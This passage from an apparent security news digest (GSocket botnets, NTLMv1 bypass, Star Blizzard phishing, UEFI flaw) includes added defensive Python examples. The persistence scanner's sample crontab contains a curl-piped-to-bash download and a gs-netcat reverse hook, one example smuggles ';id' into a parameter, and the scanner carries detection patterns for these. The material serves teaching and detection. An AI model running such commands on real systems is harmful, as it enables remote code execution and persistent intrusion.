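The command injection flaw in the list above (CVE-2024-52320) belongs to a bug class that is easy to show in miniature: a request parameter is spliced into a shell command string, so shell metacharacters in the parameter become extra commands. The block below is an added, generic illustration and is not the WGS-804HPT firmware's dispatcher.cgi code; the "ping" diagnostic handler and the host parameter name are assumptions chosen because such diagnostics are common in embedded web UIs. It shows the unsafe construction (returned as a string, not executed) next to the hardened version, which validates against an allowlist and hands an argument vector to the OS so no shell ever parses the value.

```python
"""Unsafe versus hardened handling of a web parameter that reaches an OS
command. Added example of the bug class, not code from the affected
firmware; the diagnostic endpoint and parameter name are assumptions."""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs

# RFC 1123 style hostname: labels of 1-63 alphanumerics/hyphens, no
# leading/trailing hyphen, whole name at most 253 characters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_command_unsafe(query_string):
    """UNSAFE pattern: the untrusted value is interpolated into a command
    line meant for a shell. Returns the string only, to make the problem
    visible without running anything."""
    host = parse_qs(query_string).get("host", [""])[0]
    return f"ping -c 1 {host}"


def validate_host(host):
    """Allowlist check: accept a literal IP address or a syntactically
    valid hostname, nothing else. Rejects metacharacters and leading '-'."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None


def build_command_safe(query_string):
    """HARDENED: validate first, then build an argv list. Returns None when
    the value is rejected."""
    host = parse_qs(query_string).get("host", [""])[0]
    if not validate_host(host):
        return None
    return ["ping", "-c", "1", host]


def run_diagnostic(query_string):
    """Execute the hardened command. shell=False means argv goes straight
    to exec(); ';', '|', '$(...)' and friends have no special meaning."""
    argv = build_command_safe(query_string)
    if argv is None:
        return 400, "invalid host"
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return 200, proc.stdout


if __name__ == "__main__":
    print(build_command_unsafe("host=192.0.2.1%3Bid"))   # shows the injected ';id'
    print(build_command_safe("host=192.0.2.1%3Bid"))     # None: rejected
    print(build_command_safe("host=switch-01.example.net"))
```

Two defences are stacked on purpose: the allowlist stops hostile input at the boundary, and the argv form means that even an allowlist mistake cannot turn into command execution, which is the property a patch for this class of flaw should guarantee.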
  • Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation
    thehackernews.com
    Jan 17, 2025 · Ravie Lakshmanan · Web Security / Botnet

    Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia.

    "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks appear tied to the proliferation of gambling-related sites, potentially as a response to the heightened government scrutiny."

    The Thales-owned company said it has detected millions of requests originating from a Python client that includes a command to install GSocket (aka Global Socket), an open-source tool that can be used to establish a communication channel between two machines regardless of the network perimeter.

    It's worth noting that GSocket has been put to use in numerous cryptojacking operations in recent months, and attackers have even exploited the access the utility provides to insert malicious JavaScript code into sites to steal payment information.

    The attack chains particularly involve attempts to deploy GSocket by leveraging pre-existing web shells installed on already compromised servers. A majority of the attacks have been found to single out servers running a popular learning management system (LMS) called Moodle.

    A noteworthy aspect of the attacks is the addition of entries to .bashrc and crontab files to ensure that GSocket keeps running even after the web shells are removed.

    It has been determined that the access afforded by GSocket to the targeted servers is weaponized to deliver PHP files that contain HTML content referencing online gambling services particularly aimed at Indonesian users.

    "At the top of each PHP file was PHP code designed to allow only search bots to access the page, but regular site visitors would be redirected to another domain," Johnston said. "The objective behind this is to target users searching for known gambling services, then redirect them to another domain."

    Imperva said the redirections lead to "pktoto[.]cc," a known Indonesian gambling site.

    The development comes as c/side revealed a widespread malware campaign that has targeted over 5,000 sites globally to create unauthorized administrator accounts, install a malicious plugin from a remote server, and siphon credential data back to it.

    The exact initial access vector used to deploy the JavaScript malware on these sites is presently not known. The malware has been codenamed WP3.XYZ in reference to the domain name associated with the server used to fetch the plugin and exfiltrate data ("wp3[.]xyz").

    To mitigate the attack, WordPress site owners are advised to keep their plugins up to date, block the rogue domain using a firewall, scan for suspicious admin accounts or plugins, and remove them.
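The persistence detail above (entries added to .bashrc and crontab so GSocket survives web shell cleanup) is what an incident responder should check once the web shells are gone. The block below is an added example, not Imperva's tooling or GSocket's own installer: it scans crontab and shell-rc contents for a few heuristic indicators (a reference to gsocket or its gs-netcat binary, a command launched from a temp directory, a download piped into a shell, an @reboot hook). The sample file contents, paths, IP address and secret are constructed for illustration, and the indicator list is a starting point an analyst would extend.

```python
"""Scan crontab and shell-rc contents for persistence entries of the kind
described above. Added example, not Imperva's or GSocket's code; the
samples and heuristics are constructed for illustration."""
import re

# Constructed samples: one benign and one or two suspicious entries each.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /dev/shm/.x/gs-netcat -s EXAMPLE_SECRET -liD
*/5 * * * * curl -fsSL http://198.51.100.7/u | bash
"""

SAMPLE_BASHRC = """\
export PATH=$HOME/bin:$PATH
alias ll='ls -alF'
[ -f /tmp/.gs/gsocket.sh ] && nohup /tmp/.gs/gsocket.sh >/dev/null 2>&1 &
"""

# (name, pattern) pairs; each is a heuristic, not proof of compromise.
INDICATORS = [
    ("gsocket-name", re.compile(r"\b(gs-netcat|gsocket)\b")),
    ("tmp-dir-exec", re.compile(r"(^|\s)(nohup\s+)?/(tmp|dev/shm|var/tmp)/\S+")),
    ("fetch-pipe-sh", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("reboot-hook", re.compile(r"^@reboot\b")),
]


def scan_lines(text, source):
    """Return (source, line_no, line, [indicator names]) for each line that
    matches at least one indicator. Comments and blank lines are skipped."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, rx in INDICATORS if rx.search(stripped)]
        if hits:
            findings.append((source, no, stripped, hits))
    return findings


def scan_samples():
    """Run the scanner over the constructed crontab and .bashrc."""
    return scan_lines(SAMPLE_CRONTAB, "crontab") + scan_lines(SAMPLE_BASHRC, ".bashrc")


if __name__ == "__main__":
    for source, no, line, hits in scan_samples():
        print(f"{source}:{no} {', '.join(hits)} :: {line}")
```

On a real host the same function would be fed the output of `crontab -l` for each user, the system crontab directories, and every shell startup file in home directories; a line matching several indicators at once (as the @reboot entry does here) deserves attention before a single weak match.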
  • How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?
    thehackernews.com
    Jan 17, 2025 · The Hacker News · Threat Detection / Zero Trust

    Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access, protecting data, maintaining compliance across all geographies, and ensuring business continuity.

    Evolved security solutions now combine zero-trust architecture with cloud-based captive portals to enhance network protection. These systems enable organizations to implement strict access controls, verify every device's security status, and maintain network separation. Through features like conditional access and device registration, businesses can offer secure guest Wi-Fi access while maintaining complete visibility and control over their network resources.

    Challenges in Wi-Fi Security Today

    Distributed organizations implementing guest Wi-Fi networks face increasingly sophisticated security challenges. The complexity of implementing and managing secure guest Wi-Fi access while maintaining network integrity has become a critical concern for both IT administrators and security practitioners.

    Common security vulnerabilities

    Modern guest Wi-Fi networks face several significant security threats:
    - Lack of Network Micro-Segmentation: Networks for unmanaged/unsecured devices often share the same infrastructure as networks for managed/corporate devices without proper isolation. This increases the risk of unauthorized access to sensitive systems or data.
    - Weak Encryption: Most guest Wi-Fi networks use "Open" authentication, which leaves client traffic unencrypted and open to spoofing. WPA3 and OWE (Opportunistic Wireless Encryption) are recommended to protect clients from the moment they associate.
    - Man-in-the-Middle (MITM) Attacks: Attackers can exploit unsecured guest Wi-Fi to intercept communications, steal credentials, or inject malicious data.
    - Inadequate Authentication: Some networks use overly simple shared passwords or no authentication at all, making it extremely easy for attackers to connect and launch attacks.
    - Rogue Access Points (APs): Attackers can set up rogue APs mimicking legitimate guest Wi-Fi to lure users and steal sensitive information.

    If not properly secured, guest Wi-Fi networks pose significant security risks. Weak access controls allow unauthorized users to exploit the network, leading to data interception and man-in-the-middle attacks. A critical issue is the lack of network segmentation; without proper isolation, attackers on the guest network may reach internal systems, risking data breaches. Insufficient authentication and weak password practices further heighten these vulnerabilities, enabling unauthorized access. To mitigate these risks, organizations should implement VLANs, strict authentication, and active monitoring. A well-segmented guest network helps maintain security while offering convenient access to visitors.

    Why is BYOD the most critical category to monitor?

    BYOD introduces a mix of unmanaged and potentially insecure devices into the network. These devices often lack corporate-level security controls and might already be compromised with malware, creating a direct entry point for attackers once connected to the network. If an attacker gains access to the network through a BYOD device, sensitive corporate data accessed from such devices is more likely to leak, whether unintentionally or maliciously.

    Here is a summary of the potential actions that can be implemented to mitigate such issues:
    - Proper Network Segmentation
    - Asset inventory
    - Encryption
    - Authentication Mechanism (like Captive Portal)
    - Profiled Security Policies
    - Monitoring and Threat Detection
    - Zero Trust Approach

    Potential consequences for businesses

    Security breaches in guest Wi-Fi networks can have devastating impacts on organizations. Recent studies indicate that 40% of businesses have experienced information compromise through public Wi-Fi networks. The financial implications are significant, with some companies reporting ransomware payments exceeding $1 million to recover their data.

    Beyond immediate financial losses, businesses face:
    - Damage to brand reputation and customer trust
    - Disruption of normal business operations
    - Potential loss of intellectual property
    - Compromise of internal network resources

    Legal and compliance considerations

    Organizations must navigate complex regulatory requirements when implementing guest Wi-Fi management systems. The legal framework includes multiple layers of compliance: they need to warrant the security level of their network while ensuring the confidentiality of users' data, and they need to cooperate with the authorities when required while complying with limited data retention period obligations.

    It is even more difficult for international organizations, because they need to monitor and stay updated on regulatory changes in various countries and jurisdictions. Operating internationally creates diverse and even contradictory obligations. For example, data retention policies differ among countries: in France, data logs must be retained for 1 year, but in Italy it is 6 years, while the General Data Protection Regulation (GDPR) requires users' data to be deleted once the purposes for which it was collected have been achieved.

    Some key regulations need to be taken into consideration:

    Therefore, businesses must implement proper documentation, monitoring systems, and security controls to maintain compliance with these regulations. Regular security audits and network infrastructure updates are essential to maintaining legal compliance while providing secure guest access.

    Leveraging Cloud Captive Portals for Enhanced Security

    Cloud-based captive portal solutions have emerged as a cornerstone of modern network security infrastructure. These systems provide organizations with centralized control over guest access while maintaining robust security protocols.

    How Cloud Captive Portals Work

    Cloud captive portals function as gateway systems that authenticate users before granting network access. The system intercepts initial connection attempts and redirects users to a secure login page. Organizations can implement various authentication methods, including:
    - Social login integration
    - Sponsor
    - Declarative Email
    - SMS Authentication

    These solutions operate without additional hardware requirements, making them infrastructure-agnostic and instantly deployable across global locations.

    Integration with Zero Trust frameworks

    Modern cloud captive portals should align seamlessly with Zero Trust security principles by implementing continuous verification and limited access protocols. The integration enables:
    - Device Profiling & Authentication
    - Integrity Access Control
    - Policy Enforcement
    - Automation
    - Traffic Monitoring & Compliance

    Required security features to deploy a cloud captive portal solution

    Modern captive portal solutions should incorporate multiple layers of security protection. Innovative solutions now integrate with leading security solutions, enabling administrators to implement granular access controls and URL filtering.

    The Cloudi-Fi platform supports comprehensive compliance requirements through regional data center deployment, ensuring adherence to local privacy regulations. Automated encryption of personal data and transparent collection processes give users and administrators complete control over information handling.

    Advanced features include integration with cloud-based security platforms, enabling:
    - Cloud firewall implementation
    - Content filtering capabilities
    - Bandwidth Control
    - Automated device onboarding

    These capabilities offer a robust security framework that protects both the organization's network and user data while maintaining seamless access for authorized users.

    Benefits of a Zero Trust Captive Portal Solution

    The implementation of Zero Trust Architecture represents a paradigm shift in securing guest Wi-Fi networks, moving away from traditional perimeter-based security to a more comprehensive verification model. This approach fundamentally changes how organizations manage and secure guest network access.

    Zero Trust cloud captive portal solutions provide a scalable, centralized access control layer across multiple sites or large office campuses. By leveraging cloud-based infrastructure, they allow seamless deployment without extensive on-prem hardware, ensuring consistent policy enforcement and secure, device-specific access. The cloud-based platform dynamically scales to handle high volumes of traffic and multiple entry points, while continuously monitoring user behavior. This architecture not only simplifies management but also enhances security: threats are isolated, and access is tightly controlled based on identity, device, and risk assessment, all through a unified, cloud-driven approach.

    Adapting Zero Trust principles for guest access

    Organizations must carefully adapt Zero Trust principles to maintain security while ensuring a seamless guest experience. The implementation requires a balanced approach that considers security requirements and user convenience. Key adaptation strategies include:
    - Role-based permissions for access control
    - Sponsoring, social login with MFA, or mail address for user authentication
    - Segmentation for network isolation
    - Time-limited access tokens for session management

    Benefits over traditional security models

    Zero Trust Architecture offers significant advantages compared to conventional security approaches. The model eliminates the inherent vulnerabilities of traditional perimeter-based security by implementing continuous verification and granular access controls.

    The transformation from traditional to zero-trust security brings multiple operational improvements:
    - Enhanced Security Posture: elimination of lateral movement threats; real-time threat detection and response; comprehensive audit trails
    - Operational Efficiency: automated device onboarding; centralized policy management; simplified compliance reporting

    The architecture's ability to maintain strict security controls while supporting dynamic access requirements makes it particularly effective for guest Wi-Fi environments. By implementing least-privilege access principles, organizations can ensure that guests receive only the necessary network resources while maintaining complete visibility and control over all network activities.

    Integrating Zero Trust principles with cloud-based management platforms enables distributed organizations to scale their guest Wi-Fi security efficiently. This combination offers network and security administrators powerful tools for monitoring network usage, enforcing security policies, and responding to potential threats in real time.

    Conclusion

    The transformation of guest Wi-Fi security through cloud captive portals and Zero Trust Architecture marks a significant advancement in corporate network protection. Modern organizations require robust security solutions that extend beyond traditional perimeter defenses. The combination of continuous verification, granular access controls, and advanced monitoring capabilities creates a comprehensive security framework that addresses current and emerging threats while maintaining operational efficiency.

    Business leaders must recognize the critical role of secure guest Wi-Fi in maintaining regulatory compliance and protecting sensitive data. Organizations ready to strengthen their network security should consider implementing a Zero Trust Captive Portal solution; Cloudi-Fi offers extensive resources and guidance for this security upgrade. This strategic approach positions businesses to meet future security challenges while providing secure, seamless guest access that supports operational goals and protects valuable digital assets.

    Note: This article is expertly written and contributed by RJ Singh, Chief Revenue Officer at Cloudi-Fi, with extensive experience in sales leadership and business development, and Simon Mesnage, Senior Network Engineer with 8 years of expertise in Wi-Fi infrastructure design and troubleshooting. This article is a contributed piece from one of our valued partners.
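Two of the adaptation strategies listed under "Adapting Zero Trust principles for guest access", role-based permissions and time-limited access tokens, can be shown concretely as a small token scheme a captive portal could issue after authentication. The block below is an added example and not Cloudi-Fi's implementation: the token format (signed JSON claims with an expiry, bound to the authenticated device), the role names, the zone-to-role mapping and the signing key are all constructed assumptions. What it demonstrates is the enforcement side: a token that is expired, presented by a different device, tampered with, or scoped to a lesser role is refused before any zone is reachable.

```python
"""Time-limited, role-scoped, device-bound guest session tokens.

Added example, not Cloudi-Fi's code. Roles, zones, token layout and the
signing key are constructed assumptions for illustration."""
import base64
import hashlib
import hmac
import json
import time

# Constructed key; a real portal keeps this in a secrets store and rotates it.
SIGNING_KEY = b"example-portal-signing-key-rotate-me"

# Role-based permissions: which network zones each guest role may reach
# (least privilege: 'visitor' gets Internet only).
ROLE_ZONES = {
    "visitor": {"internet"},
    "contractor": {"internet", "printers"},
    "byod": {"internet", "printers", "intranet-web"},
}


def b64encode_url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64decode_url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_token(device_id, role, ttl_seconds, now=None):
    """Return base64(payload).base64(HMAC-SHA256(payload)).
    device_id would be the MAC or registration id seen at the portal."""
    if role not in ROLE_ZONES:
        raise ValueError("unknown role")
    now = int(time.time()) if now is None else now
    claims = {"dev": device_id, "role": role, "exp": now + ttl_seconds}
    payload = json.dumps(claims, sort_keys=True).encode()
    mac = hmac.new(SIGNING_KEY, payload, hashlib.sha256).digest()
    return b64encode_url(payload) + "." + b64encode_url(mac)


def verify_token(token, device_id, now=None):
    """Return the claims if the signature is valid, the token is unexpired
    and it was issued to device_id; otherwise None."""
    now = int(time.time()) if now is None else now
    try:
        p64, m64 = token.split(".")
        payload, mac = b64decode_url(p64), b64decode_url(m64)
    except (ValueError, TypeError):
        return None
    expected = hmac.new(SIGNING_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time comparison
        return None
    claims = json.loads(payload)
    if claims.get("exp", 0) <= now or claims.get("dev") != device_id:
        return None
    return claims


def authorize(token, device_id, zone, now=None):
    """Policy decision point: may this device reach this zone right now?"""
    claims = verify_token(token, device_id, now=now)
    return claims is not None and zone in ROLE_ZONES.get(claims["role"], set())


if __name__ == "__main__":
    tok = issue_token("aa:bb:cc:dd:ee:ff", "contractor", ttl_seconds=3600, now=1000)
    print(authorize(tok, "aa:bb:cc:dd:ee:ff", "printers", now=2000))      # True
    print(authorize(tok, "aa:bb:cc:dd:ee:ff", "intranet-web", now=2000))  # False
    print(authorize(tok, "aa:bb:cc:dd:ee:ff", "printers", now=5000))      # False (expired)
```

Binding the token to the device identifier and keeping the lifetime short is what turns a one-time portal login into the "continuous verification" the article describes: when the token lapses the guest must re-authenticate, and a token copied to another device is useless.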
  • European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to China
    thehackernews.com
    Jan 17, 2025 | Ravie Lakshmanan | Privacy / Data Protection

    Austrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China.

    The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data from being potentially accessed by the Chinese government. The complaints have been filed in Austria, Belgium, Greece, Italy, and the Netherlands.

    "Given that China is an authoritarian surveillance state, it is crystal clear that China doesn't offer the same level of data protection as the E.U.," Kleanthi Sardeli, data protection lawyer at noyb, said. "Transferring Europeans' personal data is clearly unlawful and must be terminated immediately."

    Noyb noted that the companies have no choice but to comply with Chinese authorities' requests for access to data, and that Beijing lacks an independent data protection authority to raise issues related to government surveillance.

    It also said none of the companies responded to its access requests under the General Data Protection Regulation (GDPR) seeking clarity on the nature of the data transfers and whether data is transmitted to China or any other country outside the E.U.

    "According to their privacy policy, AliExpress, SHEIN, TikTok, and Xiaomi transfer data to China," noyb said. "Temu and WeChat mention transfers to third countries. According to Temu and WeChat's corporate structure, this most likely includes China."

    The development comes as ByteDance-owned TikTok is preparing to shut down its app in the U.S. starting January 19, 2025, when a federal ban on the social media platform is scheduled to come into effect.
    In recent months, noyb has filed GDPR-related complaints against Google, Microsoft, and Mozilla for tracking users without consent through Privacy Sandbox, Xandr, and Firefox, respectively.

    FTC Takes Action Against General Motors and GoDaddy

    The complaints also coincide with the U.S. Federal Trade Commission (FTC) banning automaker General Motors, for five years, from disclosing data it collects from drivers, including geolocation and driver behavior information, to consumer reporting agencies, after it shared such data without drivers' affirmative consent.

    According to a New York Times investigation in March 2024, the information was shared with two data brokers, LexisNexis Risk Solutions and Verisk, that worked with the insurance industry to generate risk profiles and increase auto insurance rates for some drivers. In a statement, General Motors said it had already discontinued the "Smart Driver" data collection program in April 2024 "due to customer feedback." The company said customers could access and delete their personal information through a U.S. Consumer Privacy Request Form on its website.

    The FTC has also ordered website hosting provider GoDaddy to implement a comprehensive information security program to overhaul its "unreasonable security practices" that led to multiple customer data breaches between 2019 and 2022.
    GoDaddy has not admitted to any wrongdoing, nor has it been fined.

    "GoDaddy has failed to implement reasonable and appropriate security measures to protect and monitor its website-hosting environments for security threats, and misled customers about the extent of its data security protections on its website hosting services," the FTC said.

    The agency pointed out that GoDaddy failed to properly manage its assets and inventory; patch its software; assess risks to its hosting services; use multi-factor authentication; log security-related events; monitor for security threats; segment its network; and secure connections to services providing access to consumer data.

    The consumer protection agency has since also announced amendments to online privacy safeguards for children under the Children's Online Privacy Protection Rule (COPPA) that require obtaining verifiable parental consent prior to processing their data for advertising purposes or sharing it with third parties.

    Furthermore, the rule imposes new data retention policies, requiring that companies only retain children's information "for as long as reasonably necessary to fulfill a specific purpose for which it was collected."

    "By requiring parents to opt in to targeted advertising practices, this final rule prohibits platforms and service providers from sharing and monetizing children's data without active permission," FTC Chair Lina M. Khan said.
  • Researchers Find Exploit Allowing NTLMv1 Despite Active Directory Restrictions
    thehackernews.com
    Jan 16, 2025 | Ravie Lakshmanan | Active Directory / Vulnerability

    Cybersecurity researchers have found that the Microsoft Active Directory Group Policy that's designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration.

    "A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications," Silverfort researcher Dor Segal said in a report shared with The Hacker News.

    NTLM is a still widely used mechanism, particularly in Windows environments, to authenticate users across a network. The legacy protocol, while not removed due to backward compatibility requirements, has been deprecated as of mid-2024.

    Late last year, Microsoft officially removed NTLMv1 starting in Windows 11, version 24H2, and Windows Server 2025. While NTLMv2 introduces new mitigations to make it harder to perform relay attacks, the technology has been besieged by several security weaknesses that have been actively exploited by threat actors to access sensitive data.

    In exploiting these flaws, the idea is to coerce a victim to authenticate to an arbitrary endpoint, or relay the authentication information against a susceptible target and perform malicious actions on behalf of the victim.

    "The Group Policy mechanism is Microsoft's solution to disable NTLMv1 across the network," Segal explained.
    "The LMCompatibilityLevel registry key prevents the Domain Controllers from evaluating NTLMv1 messages and returns a wrong password error (0xC000006A) when authenticating with NTLMv1."

    However, Silverfort's investigation found that it's possible to circumvent the Group Policy and still use NTLMv1 authentication by taking advantage of a setting in the Netlogon Remote Protocol (MS-NRPC).

    Specifically, it leverages a data structure called NETLOGON_LOGON_IDENTITY_INFO, which contains a field named ParameterControl that, in turn, has a configuration to "Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed."

    "This research shows on-prem applications can be configured to enable NTLMv1, negating the Highest Level of the Group Policy LAN Manager authentication level set in Active Directory," Segal said. "Meaning, organizations think they are doing the right thing by setting this group policy, but it's still being bypassed by the misconfigured application."

    To mitigate the risk posed by NTLMv1, it's essential to enable audit logs for all NTLM authentication in the domain and keep an eye out for vulnerable applications that request clients to use NTLMv1 messages. It also goes without saying that organizations are recommended to keep their systems up-to-date.

    The disclosure comes as HN Security researcher Alessandro Iandoli detailed how various security features in Windows 11 (prior to version 24H2) could be bypassed to achieve arbitrary code execution at the kernel level.
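    The mitigation above comes down to auditing NTLM logons and finding the applications that still negotiate NTLMv1. The script below is an added example (not from the Silverfort report or from Microsoft) of that triage step: it parses a constructed, simplified text export of Windows Security event 4624 records, keeps the logons whose "Authentication Package" is NTLM and whose "Package Name (NTLM only)" field reads "NTLM V1", and tallies them by the workstation and source address that requested the logon, which is where the misconfigured application usually sits. The field names follow the 4624 event's Detailed Authentication Information section; the record separator, host names and addresses are constructed for the example.

```python
"""Flag NTLMv1 logons in an export of Windows Security event 4624 records.

Added example, not tooling from the report. The export format below is a
constructed, simplified rendering of 4624 fields; a real export would be
pulled from the Security log of the domain controllers.
"""
from collections import Counter

# Constructed sample: four 4624 records separated by "-----".
SAMPLE_EXPORT = """\
Event ID: 4624
Account Name: alice
Account Domain: CORP
Logon Type: 3
Workstation Name: LEGACY-APP01
Source Network Address: 10.0.5.17
Logon Process: NtLmSsp
Authentication Package: NTLM
Package Name (NTLM only): NTLM V1
-----
Event ID: 4624
Account Name: bob
Account Domain: CORP
Logon Type: 3
Workstation Name: WS-042
Source Network Address: 10.0.8.3
Logon Process: NtLmSsp
Authentication Package: NTLM
Package Name (NTLM only): NTLM V2
-----
Event ID: 4624
Account Name: carol
Account Domain: CORP
Logon Type: 2
Workstation Name: DC01
Source Network Address: -
Logon Process: Kerberos
Authentication Package: Kerberos
Package Name (NTLM only): -
-----
Event ID: 4624
Account Name: svc_backup
Account Domain: CORP
Logon Type: 3
Workstation Name: LEGACY-APP01
Source Network Address: 10.0.5.17
Logon Process: NtLmSsp
Authentication Package: NTLM
Package Name (NTLM only): NTLM V1
"""


def parse_export(blob):
    """Split the export into records and each record into a field dict."""
    records = []
    for chunk in blob.split("-----"):
        fields = {}
        for line in chunk.strip().splitlines():
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        if fields:
            records.append(fields)
    return records


def ntlmv1_logons(records):
    """Return the successful logons that were negotiated with NTLMv1.

    A logon counts only when the authentication package is NTLM and the
    NTLM-specific package name is "NTLM V1"; Kerberos and NTLMv2 are ignored.
    """
    return [
        r for r in records
        if r.get("Event ID") == "4624"
        and r.get("Authentication Package", "").upper() == "NTLM"
        and r.get("Package Name (NTLM only)", "").upper() == "NTLM V1"
    ]


def sources_to_investigate(records):
    """Count NTLMv1 logons per (workstation, source address).

    Hosts listed here are the candidate misconfigured applications the
    article says to hunt for: they are still requesting NTLMv1.
    """
    counts = Counter()
    for r in ntlmv1_logons(records):
        key = (r.get("Workstation Name", "?"), r.get("Source Network Address", "?"))
        counts[key] += 1
    return counts


if __name__ == "__main__":
    recs = parse_export(SAMPLE_EXPORT)
    for (host, addr), n in sources_to_investigate(recs).most_common():
        print(f"{host} ({addr}): {n} NTLMv1 logon(s)")
```

    On the constructed sample, only LEGACY-APP01 shows up, with two NTLMv1 logons; the Kerberos logon and the NTLMv2 logon are left out, which is the point: the list should contain only the systems whose configuration needs fixing.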
  • Russian Star Blizzard Shifts Tactics to Exploit WhatsApp QR Codes for Credential Harvesting
    thehackernews.com
    Jan 16, 2025 | Ravie Lakshmanan | Spear Phishing / Threat Intelligence

    The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection.

    "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations researchers whose work touches on Russia, and sources of assistance to Ukraine related to the war with Russia," the Microsoft Threat Intelligence team said in a report shared with The Hacker News.

    Star Blizzard (formerly SEABORGIUM) is a Russia-linked threat activity cluster known for its credential harvesting campaigns. Active since at least 2012, it's also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057.

    Previously observed attack chains have involved sending spear-phishing emails to targets of interest, usually from a Proton account, attaching documents embedding malicious links that redirect to an Evilginx-powered page that's capable of harvesting credentials and two-factor authentication (2FA) codes via an adversary-in-the-middle (AiTM) attack.

    Star Blizzard has also been linked to the use of email marketing platforms like HubSpot and MailerLite to conceal the true email sender addresses and obviate the need for including actor-controlled domain infrastructure in email messages.

    Late last year, Microsoft and the U.S.
    Department of Justice (DoJ) announced the seizure of more than 180 domains that were used by the threat actor to target journalists, think tanks, and non-governmental organizations (NGOs) between January 2023 and August 2024.

    The tech giant assessed that public disclosure of its activities may have prompted the hacking crew to switch up its tactics by compromising WhatsApp accounts. That said, the campaign appears to have been limited and wound down at the end of November 2024.

    "The targets primarily belong to the government and diplomacy sectors, including both current and former officials," Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, told The Hacker News. "Additionally, the targets encompass individuals involved in defense policy, researchers in international relations focusing on Russia, and those providing assistance to Ukraine in relation to the war with Russia."

    It all starts with a spear-phishing email that purports to be from a U.S. government official to lend it a veneer of legitimacy and increase the likelihood that the victim would engage with them.

    The message contains a quick response (QR) code that urges the recipients to join a supposed WhatsApp group on "the latest non-governmental initiatives aimed at supporting Ukraine NGOs." The code, however, is deliberately broken so as to trigger a response from the victim.

    Should the email recipient reply, Star Blizzard sends a second message, asking them to click on a t[.]ly shortened link to join the WhatsApp group, while apologizing for the inconvenience caused.

    "When this link is followed, the target is redirected to a web page asking them to scan a QR code to join the group," Microsoft explained.
    "However, this QR code is actually used by WhatsApp to connect an account to a linked device and/or the WhatsApp Web portal."

    If the target follows the instructions on the site ("aerofluidthermo[.]org"), the approach allows the threat actor to gain unauthorized access to their WhatsApp messages and even exfiltrate the data via browser add-ons.

    Individuals belonging to sectors targeted by Star Blizzard are advised to exercise caution when handling emails containing links to external sources.

    The campaign "marks a break in long-standing Star Blizzard TTPs and highlights the threat actor's tenacity in continuing spear-phishing campaigns to gain access to sensitive information even in the face of repeated degradations of its operations."
  • New UEFI Secure Boot Vulnerability Could Allow Attackers to Load Malicious Bootkits
    thehackernews.com
    Jan 16, 2025 | Ravie Lakshmanan | Vulnerability / Cybersecurity

    Details have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems.

    The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft's "Microsoft Corporation UEFI CA 2011" third-party UEFI certificate, according to a new report from ESET shared with The Hacker News.

    Successful exploitation of the flaw can lead to the execution of untrusted code during system boot, thereby enabling attackers to deploy malicious UEFI bootkits on machines that have Secure Boot on, irrespective of the operating system installed.

    Secure Boot is a firmware security standard that prevents malware from loading when a computer starts up by ensuring that the device boots using only software that is trusted by the Original Equipment Manufacturer (OEM). The feature leverages digital signatures to validate the authenticity, source, and integrity of the code that is loaded.

    The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH:

    - Howyar SysReturn before version 10.2.023_20240919
    - Greenware GreenGuard before version 10.2.023-20240927
    - Radix SmartRecovery before version 11.2.023-20240927
    - Sanfong EZ-back System before version 10.3.024-20241127
    - WASAY eRecoveryRX before version 8.4.022-20241127
    - CES NeoImpact before version 10.1.024-20241127
    - SignalComputer HDD King before version 10.3.021-20241127

    "The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage," ESET researcher Martin Smolár said.
